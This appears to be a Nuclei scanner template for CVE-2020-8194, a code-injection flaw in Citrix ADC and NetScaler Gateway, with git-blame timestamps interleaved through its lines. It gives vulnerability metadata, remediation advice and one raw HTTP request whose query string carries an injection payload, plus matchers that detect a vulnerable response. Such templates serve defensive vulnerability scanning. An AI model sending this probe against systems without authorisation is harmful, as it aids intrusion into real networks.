2021-01-02 04:56:15 +00:00
id : CVE-2020-8194
2020-07-11 17:52:28 +00:00
info :
2023-04-04 19:57:52 +00:00
name : Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection
2020-07-11 17:52:28 +00:00
author : dwisiswant0
2021-09-10 11:26:40 +00:00
severity : medium
2023-04-04 19:57:52 +00:00
description : Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://support.citrix.com/article/CTX276688
2023-04-04 19:57:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8194
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8194
cwe-id : CWE-94
2023-10-27 16:34:45 +00:00
epss-score : 0.90775
2023-12-12 11:07:52 +00:00
epss-percentile : 0.98558
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : citrix
product : application_delivery_controller_firmware
tags : cve,cve2020,citrix
2020-07-11 17:52:28 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-11 17:52:28 +00:00
- raw :
- |
GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
Host : {{Hostname}}
Cookie : startupapp=st
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-07-11 17:52:28 +00:00
words :
- "<jnlp codebase=\"nonexistent.1337\">"
2021-09-08 12:17:19 +00:00
2020-07-11 17:52:28 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-07-11 17:52:28 +00:00
words :
- "application/x-java-jnlp-file"
2021-09-08 12:17:19 +00:00
2020-07-11 17:52:28 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100c7ad7895a3a2237f62c071b66d60f12bab59084db3d4452239d0d6be39ab453d0220116e1230c5e3237859ca6e50cb313f7ee40da5e29ce88383cae1908fc43dd4f9:922c64590222798bb761d5b6d8e72950